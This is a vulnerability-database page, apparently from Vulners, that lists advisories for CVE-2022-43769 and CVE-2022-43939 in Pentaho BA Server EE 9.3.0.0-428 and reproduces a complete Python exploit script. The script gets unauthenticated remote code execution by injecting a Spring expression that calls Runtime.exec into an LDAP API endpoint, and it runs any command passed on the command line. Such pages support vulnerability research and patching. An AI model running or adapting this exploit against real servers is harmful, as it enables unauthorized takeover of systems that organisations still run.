Vulners
Lucene search
Pentaho BA Server EE 9.3.0.0-428 - Remote Code Execution (RCE) (Unauthenticated)
| Reporter | Title | Published | Views | Family All 36 |
|---|---|---|---|---|
 | Pentaho BA Server EE 9.3.0.0-428 Server-Side Template Injection / Remote Code Execution | 5 Apr 202300:00 | – | zdt |
 | CVE-2022-43769 | 3 Apr 202300:00 | – | attackerkb |
| CVE-2022-43939 | 3 Apr 202300:00 | – | attackerkb |
 | CVE-2022-43769 | 3 Apr 202322:25 | – | circl |
| CVE-2022-43939 | 3 Apr 202322:24 | – | circl |
 | Hitachi Vantara Pentaho BA Server Special Element Injection Vulnerability | 3 Mar 202500:00 | – | cisa_kev |
| Hitachi Vantara Pentaho BA Server Authorization Bypass Vulnerability | 3 Mar 202500:00 | – | cisa_kev |
 | CISA Adds Five Known Exploited Vulnerabilities to Catalog | 3 Mar 202512:00 | – | cisa |
 | Hitachi Vantara Pentaho Business Analytics Server 安全漏洞 | 3 Apr 202300:00 | – | cnnvd |
| Hitachi Vantara Pentaho Business Analytics Server 代码注入漏洞 | 3 Apr 202300:00 | – | cnnvd |
10
# Exploit Title: Pentaho BA Server EE 9.3.0.0-428 - Remote Code Execution (RCE) (Unauthenticated)
# Author: dwbzn
# Date: 2022-04-04
# Vendor: https://www.hitachivantara.com/
# Software Link: https://www.hitachivantara.com/en-us/products/lumada-dataops/data-integration-analytics/download-pentaho.html
# Version: Pentaho BA Server 9.3.0.0-428
# CVE: CVE-2022-43769, CVE-2022-43939
# Tested on: Windows 11
# Credits: https://research.aurainfosec.io/pentest/pentah0wnage
# NOTE: This only works on the enterprise edition. Haven't tested it on Linux, but it should work (don't use notepad.exe).
# Unauthenticated RCE via SSTI using CVE-2022-43769 and CVE-2022-43939 (https://research.aurainfosec.io/pentest/pentah0wnage)
import requests
import argparse
parser = argparse.ArgumentParser(description='CVE-2022-43769 + CVE-2022-43939 - Unauthenticated RCE via SSTI')
parser.add_argument('baseurl', type=str, help='base url e.g. http://127.0.0.1:8080/pentaho')
parser.add_argument('--cmd', type=str, default='notepad.exe', nargs='?', help='command to execute (default notepad.exe)', required=False)
args = parser.parse_args()
url = f"{args.baseurl}/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{{T(java.lang.Runtime).getRuntime().exec('{args.cmd}')}}&mgrDn=a&pwd=a"
print ("running...")
r = requests.get(url)
if r.text == 'false':
print ("command should've executed! nice.")
else:
print ("didn't work. sadge...")Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Apr 2023 00:00Current
8.4High risk
Vulners AI Score8.4
CVSS 3.18.8 - 9.8
EPSS0.93976
SSVC